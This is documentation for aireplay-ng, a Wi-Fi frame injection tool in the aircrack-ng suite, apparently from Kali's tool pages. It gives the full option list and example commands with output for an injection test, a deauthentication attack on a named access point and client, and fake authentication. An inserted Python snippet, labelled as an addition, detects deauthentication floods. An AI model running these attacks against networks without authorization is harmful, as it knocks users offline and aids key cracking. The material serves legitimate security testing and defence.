Aireplay-ng Description

Aireplay-ng is included in the aircrack-ng package and is used to inject wireless frames. Its main role is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys. Aireplay-ng implements several attacks: deauthenticating wireless clients in order to capture WPA handshake data, fake authentication, interactive packet replay, hand-crafted ARP request injection, and ARP-request reinjection.

Source: Aireplay-ng Wiki
Aireplay-ng Homepage | Kali aircrack-ng Repo

  • Author: Thomas d’Otreppe, Original work: Christophe Devine
  • License: GPLv2
aireplay-ng – inject packets into a wireless network to generate traffic
root@kali:~# aireplay-ng --help

  Aireplay-ng 1.5.2 - (C) 2006-2018 Thomas d'Otreppe

  usage: aireplay-ng <options> <replay interface>

  Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Replay options:

      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -g value  : change ring buffer size (default: 8)
      -F        : choose first matching packet

      Fakeauth attack options:

      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec    : seconds between keep-alives
      -Q        : send reassociation requests
      -y prga   : keystream for shared key auth
      -T n      : exit after retry fake auth request n time

      Arp Replay attack options:

      -j        : inject FromDS packets

      Fragmentation attack options:

      -k IP     : set destination IP in fragments
      -l IP     : set source IP in fragments

      Test attack options:

      -B        : activates the bitrate test

  Source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

  Miscellaneous options:

      -R                    : disable /dev/rtc usage
      --ignore-negative-one : if the interface's channel can't be determined,
                              ignore the mismatch, needed for unpatched cfg80211

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen

aireplay-ng Usage Examples

Injection Test

Run the injection test (-9) via the monitor mode interface wlan0mon.

root@kali:~# aireplay-ng -9 wlan0mon
22:55:44  Trying broadcast probe requests...
22:55:44  Injection is working!
22:55:46  Found 4 APs

22:55:46  Trying directed probe requests...
22:55:46  24:FB:95:FD:3D:7F - channel: 6 - 'America'
22:55:52   30/30: 100%

22:55:52  34:6D:A0:CD:45:10 - channel: 6 - 'ATT2b8i4UD'
22:55:58   27/30:  90%

22:55:58  50:64:3D:2A:F7:A0 - channel: 6 - 'FBI surveillance van'
22:56:04   12/30:  40%

22:56:04  16:6E:EF:29:67:46 - channel: 6 - 'dd-wrt_vap'
22:56:10   1/30:   3%

Deauthentication Attack

Run the deauthentication attack (-0), sending 5 packets to the wireless access point (-a 8C:7F:3B:7E:81:B6) to deauthenticate a wireless client (-c 00:08:22:B9:41:A1) via the monitor mode interface wlan0mon.

root@kali:~# aireplay-ng -0 5 -a 8C:7F:3B:7E:81:B6 -c 00:08:22:B9:41:A1 wlan0mon
12:41:56  Waiting for beacon frame (BSSID: 8C:7F:3B:7E:81:B6) on channel 6
12:41:57  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:58  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:41:59  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
12:42:00  Sending 64 directed DeAuth. STMAC: [00:08:22:B9:41:A1] [ 0| 0 ACKs]
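A defender-side counterpart to the output above, added here as an example and not part of the original page or of aircrack-ng: it parses raw 802.11 management frames (type 0, subtype 12, the same fields the -u/-v filter options select), and flags any BSSID/station pair that receives a burst of deauthentication frames within a one-second sliding window, which is what the "Sending 64 directed DeAuth" lines produce on the air. The BSSID and station MACs are the ones from the example command; the capture is constructed inline, and frames are assumed to arrive without a radiotap header.

```python
"""Detect deauthentication floods in raw 802.11 frames (no radiotap header assumed)."""
import struct
from collections import defaultdict, deque

MGMT_TYPE, DEAUTH_SUBTYPE = 0, 12   # frame control type/subtype (aireplay-ng -u 0 -v 12)
AP, STA = "8C:7F:3B:7E:81:B6", "00:08:22:B9:41:A1"   # addresses from the page's example


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02X}" for b in raw)


def build_deauth(dst, src, bssid, reason=7, seq=0):
    """Constructed test input: one directed deauth frame (24-byte header + reason code)."""
    fc = bytes([(DEAUTH_SUBTYPE << 4) | (MGMT_TYPE << 2), 0x00])  # version 0, ToDS/FromDS clear
    hdr = fc + struct.pack("<H", 0) + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    return hdr + struct.pack("<H", seq << 4) + struct.pack("<H", reason)


def parse_frame(raw):
    """Return type, subtype and the three addresses of an 802.11 frame, or None if truncated."""
    if len(raw) < 24:
        return None
    fc0 = raw[0]
    return {"type": (fc0 >> 2) & 0x3, "subtype": (fc0 >> 4) & 0xF,
            "addr1": mac_str(raw[4:10]), "addr2": mac_str(raw[10:16]),
            "addr3": mac_str(raw[16:22])}


def deauth_floods(frames, window=1.0, threshold=20):
    """frames: iterable of (timestamp, raw_bytes). Returns {(bssid, target): peak_count}
    for every pair that saw >= threshold deauth frames inside any window-second span."""
    recent, flagged = defaultdict(deque), {}
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        p = parse_frame(raw)
        if not p or p["type"] != MGMT_TYPE or p["subtype"] != DEAUTH_SUBTYPE:
            continue
        key = (p["addr3"], p["addr1"])
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(q))
    return flagged


def sample_capture():
    """Constructed: a 64-frame AP->STA deauth burst in under a second, plus one lone broadcast deauth."""
    burst = [(100.0 + i * 0.01, build_deauth(STA, AP, AP, seq=i)) for i in range(64)]
    lone = [(200.0, build_deauth("FF:FF:FF:FF:FF:FF", AP, AP, reason=3))]
    return burst + lone
```

The lone broadcast deauth stays below the threshold and is not reported; in a live deployment the input would come from a monitor-mode capture with the radiotap header stripped first.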

Fake Authentication

Run the fake authentication attack and re-authenticate every 6000 seconds (-1 6000) against the access point (-a F0:F2:49:82:DF:3B) with the given ESSID (-e FBI-Van-24), specifying our MAC address (-h 3c:46:d8:4e:ef:aa), using the monitor mode interface wlan0mon.

root@kali:~# aireplay-ng -1 6000 -e FBI-Van-24 -a F0:F2:49:82:DF:3B -h 3c:46:d8:4e:ef:aa wlan0mon
12:49:59  Waiting for beacon frame (BSSID: F0:F2:49:82:DF:3B) on channel 6

12:50:06  Sending Authentication Request (Open System)